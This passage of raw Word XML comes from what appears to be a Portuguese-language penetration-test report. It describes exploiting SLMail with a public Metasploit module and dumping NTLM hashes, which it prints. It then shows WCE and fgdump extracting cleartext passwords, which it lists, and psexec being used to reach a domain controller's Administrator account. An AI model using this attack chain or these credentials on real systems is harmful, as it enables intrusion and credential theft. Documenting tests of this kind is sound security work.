                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>SO: Windows XP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E62DA" w14:paraId="64B892C8" w14:textId="77777777" w:rsidTr="003E6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14:paraId="7F1506F3" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Serviços: SLMAIL (PORTA 110)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23450782" w14:textId="49C344E1" w:rsidR="00640235" w:rsidRDefault="003E62DA" w:rsidP="00940DE4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Descobrimos que o SLMAIL é vulnerável e possui um EXPLOIT público que explora essa falha.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8720"/>
      </w:tblGrid>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="003E62DA" w14:paraId="2B74D4A9" w14:textId="77777777" w:rsidTr="003E62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14:paraId="14DADD9F" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="003E62D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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003E62D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E62DA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3E62DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/pop3/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003E62DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>seattlelab_pass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17E0E6F7" w14:textId="69A00298" w:rsidR="00352A7D" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left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4"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizando o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exploit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acima conseguimos comprometer essa estação de trabalho e uma vez com acesso fizemos um DUMP dos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hashs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de senhas dessa estação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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="003E62DA" w:rsidRPr="003E62DA" w14:paraId="6C7DF393" w14:textId="77777777" w:rsidTr="003E62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14:paraId="39C24280" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="00B43014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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Administrador:500:aad3b435b51404eeaad3b435b51404ee:ae4b9891ebd7e330df8bbfe37d5e5e08:::</w:t>
            </w:r>
            <w:r w:rsidRPr="003E62D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62DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Convidado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
            </w:r>
            <w:r w:rsidRPr="003E62D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62DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HelpAssistant:1000:53400e6be3b44a71ae7c89da5d20c6e3:389b28049ba082c4a57c336976f3f520:::</w:t>
            </w:r>
            <w:r w:rsidRPr="003E62D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62DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>rafaela:1005:aad3b435b51404eeaad3b435b51404ee:ee8ba375ac2b804683ab960dad19581e:::</w:t>
            </w:r>
            <w:r w:rsidRPr="003E62D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62DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Usuario:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="223821CD" w14:textId="77777777" w:rsidR="003E62DA" w:rsidRPr="003E62DA" w:rsidRDefault="003E62DA" w:rsidP="00940DE4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1772B01" w14:textId="00E3EBB0" w:rsidR="00352A7D" w:rsidRPr="003E62DA" w:rsidRDefault="00352A7D" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Essas informações podem ser uteis para usarmos té</w:t>
      </w:r>
      <w:r w:rsidR="003E62DA" w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cnicas como </w:t>
      </w:r>
      <w:r w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
      <w:r w:rsidR="003E62DA" w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>THE</w:t>
      </w:r>
      <w:r w:rsidR="003E62DA" w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HASH para se autenticar em outros hosts da rede.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70393289" w14:textId="24A39CF8" w:rsidR="00352A7D" w:rsidRPr="003E62DA" w:rsidRDefault="00352A7D" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Uma vez com acesso a essa maquina nós utilizamos </w:t>
      </w:r>
      <w:r w:rsidR="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">um software chamado </w:t>
      </w:r>
      <w:r w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">WCE e </w:t>
      </w:r>
      <w:r w:rsidR="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">outro chamado </w:t>
      </w:r>
      <w:r w:rsidRPr="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FGDUMP </w:t>
      </w:r>
      <w:r w:rsidR="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">para extrair informações sobre cache de usuário </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>logado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E62DA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e conseguir </w:t>
      </w:r>
      <w:r w:rsidR="00555AA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pegar a senha do usuário utilizando injeção em memória.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EFA27A" w14:textId="3533B1FD" w:rsidR="00352A7D" w:rsidRDefault="00352A7D" w:rsidP="00940DE4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1B400690" wp14:editId="18ECE845">
            <wp:extent cx="5400040" cy="2569210"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 14.17.3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99FF9" w14:textId="76180D38" w:rsidR="00555AA8" w:rsidRPr="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4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videncia acima conseguimos identificar o usuário </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>roge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domíni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business.rede</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="539763ED" w14:textId="51815FBE" w:rsidR="00352A7D" w:rsidRDefault="00352A7D" w:rsidP="00940DE4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6B42E5BF" wp14:editId="51D00CA2">
            <wp:extent cx="5400040" cy="3362960"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 14.16.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DECD" w14:textId="4B09A350" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4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videncia acima o WCE consegue pegar a senha do usuário </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>roge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 texto claro. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB3031D" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRPr="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4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3E9D1F4D" w14:textId="4497DF7E" w:rsidR="00640235" w:rsidRDefault="00352A7D" w:rsidP="00940DE4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1165C489" wp14:editId="29D88E1A">
            <wp:extent cx="5400040" cy="1697355"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 14.17.1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54BE" w14:textId="6D2741B6" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4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videncia acima mostra configurações da rede do workstation onde podemos ver o IP 172.16.1.60 que é o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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DC (Do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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00555AA8" w:rsidRPr="00555AA8" w14:paraId="177F3427" w14:textId="77777777" w:rsidTr="00555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14:paraId="2D1B9DBD" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRPr="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00555AA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AA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Credenciais obtidas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00555AA8" w:rsidRPr="00555AA8" w14:paraId="5CC19C57" w14:textId="77777777" w:rsidTr="00555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14:paraId="06008381" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRPr="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00555AA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AA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Dominio</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00555A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55AA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Gbusiness</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00555AA8" w:rsidRPr="00555AA8" w14:paraId="7666578E" w14:textId="77777777" w:rsidTr="00555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14:paraId="0A97A374" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRPr="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00555AA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AA8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  <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00555A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55AA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>rogerio</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00555AA8" w14:paraId="76C1BEF6" w14:textId="77777777" w:rsidTr="00555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14:paraId="4F39C830" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00555AA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AA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Senha: Roger@10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B812B81" w14:textId="1E896516" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4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Informações sobre o controlador de domínio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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00555AA8" w:rsidRPr="003E62DA" w14:paraId="386696A6" w14:textId="77777777" w:rsidTr="00061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14:paraId="613E91A7" w14:textId="590AB8B2" w:rsidR="00555AA8" w:rsidRPr="003E62DA" w:rsidRDefault="00555AA8" w:rsidP="000610E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VIDOR PRINCIPAL (Doma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5AA8" w:rsidRPr="003E62DA" w14:paraId="005F189C" w14:textId="77777777" w:rsidTr="00061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14:paraId="52AE361F" w14:textId="282D46FF" w:rsidR="00555AA8" w:rsidRPr="003E62DA" w:rsidRDefault="00555AA8" w:rsidP="000610E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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IP: 172.16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55AA8" w:rsidRPr="003E62DA" w14:paraId="38E3C6DA" w14:textId="77777777" w:rsidTr="00061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14:paraId="5B3FC7E0" w14:textId="0AD0C52F" w:rsidR="00555AA8" w:rsidRPr="003E62DA" w:rsidRDefault="00555AA8" w:rsidP="000610E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: Windows Server 2008 R2 Enterprise</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00555AA8" w14:paraId="4765F3F4" w14:textId="77777777" w:rsidTr="00061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14:paraId="15505F55" w14:textId="57F06EAD" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="000610E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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Servi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: SMB,RDP(TS),AD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49CC2D10" w14:textId="54BB981B" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4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Uma vez que identificamos o servidor principal e temos credencias validas na rede podemos utilizar um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>explo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tentar se autenticar no servidor e ganhar um acesso a el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720"/>
      </w:tblGrid>
      <w:tr w:rsidR="00555AA8" w14:paraId="16CA2876" w14:textId="77777777" w:rsidTr="00555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14:paraId="41F60928" w14:textId="647F040B" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00555AA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AA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>exploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00555A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55AA8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555A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55AA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>smb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00555A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55AA8">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>psexec</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18AB3F40" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4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1281F8B7" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F2F321D" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A24DC3" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8E19C5" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7F4BA4" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0185D1CF" w14:textId="77777777" w:rsidR="00555AA8" w:rsidRDefault="00555AA8" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E5FAD2" w14:textId="593B75F8" w:rsidR="00D81233" w:rsidRPr="00493D68" w:rsidRDefault="00D81233" w:rsidP="00940DE4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177C144B" wp14:editId="67AAC00F">
            <wp:extent cx="4978400" cy="2984500"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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6-06-17 at 14.17.0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D68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00493D68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Uma ve</w:t>
      </w:r>
      <w:r w:rsidR="00A5030A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>z com acesso ao Servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00493D68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizamos as mesmas técnicas empregadas anteriormente para tentar conseguir a senha de Administrador usando o WCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7862900A" w14:textId="4F855BEC" w:rsidR="00D81233" w:rsidRDefault="00D81233" w:rsidP="00940DE4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4A243A6F" wp14:editId="7271A7CD">
            <wp:extent cx="5400040" cy="4279265"/>
            <wp:effectExtent l="0" t="0" r="1016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6-06-17 at 14.16.4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C15A" w14:textId="77777777" w:rsidR="00493D68" w:rsidRPr="00493D68" w:rsidRDefault="00493D68" w:rsidP="00493D68">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00493D68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Como podemos observar conseguimos capturar a senha do Administrador utilizando o WCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454854A6" w14:textId="77777777" w:rsidR="00493D68" w:rsidRDefault="00493D68" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E441F8" w14:textId="77777777" w:rsidR="00493D68" w:rsidRDefault="00493D68" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/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93D68" w:rsidRPr="003E62DA" w14:paraId="09F1BC70" w14:textId="77777777" w:rsidTr="00061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14:paraId="0EF28C01" w14:textId="77777777" w:rsidR="00493D68" w:rsidRPr="003E62DA" w:rsidRDefault="00493D68" w:rsidP="000610E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VIDOR PRINCIPAL (Doma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3D68" w:rsidRPr="003E62DA" w14:paraId="5E79740F" w14:textId="77777777" w:rsidTr="00061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14:paraId="19D6BF66" w14:textId="77777777" w:rsidR="00493D68" w:rsidRPr="003E62DA" w:rsidRDefault="00493D68" w:rsidP="000610E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2DA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>IP: 172.16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93D68" w:rsidRPr="003E62DA" w14:paraId="147D4CB3" w14:textId="77777777" w:rsidTr="00061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14:paraId="746652A4" w14:textId="4475D70D" w:rsidR="00493D68" w:rsidRPr="003E62DA" w:rsidRDefault="00493D68" w:rsidP="000610E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Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00493D68" w14:paraId="240467B5" w14:textId="77777777" w:rsidTr="00061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14:paraId="25F430E4" w14:textId="4B16D077" w:rsidR="00493D68" w:rsidRDefault="00493D68" w:rsidP="000610E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ha: $3rv3r@2008#</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E06FFCD" w14:textId="77777777" w:rsidR="00493D68" w:rsidRDefault="00493D68" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A96BDDE" w14:textId="677A88A1" w:rsidR="00D81233" w:rsidRPr="00493D68" w:rsidRDefault="00D81233" w:rsidP="00940DE4">
      <w:pPr>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00493D68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
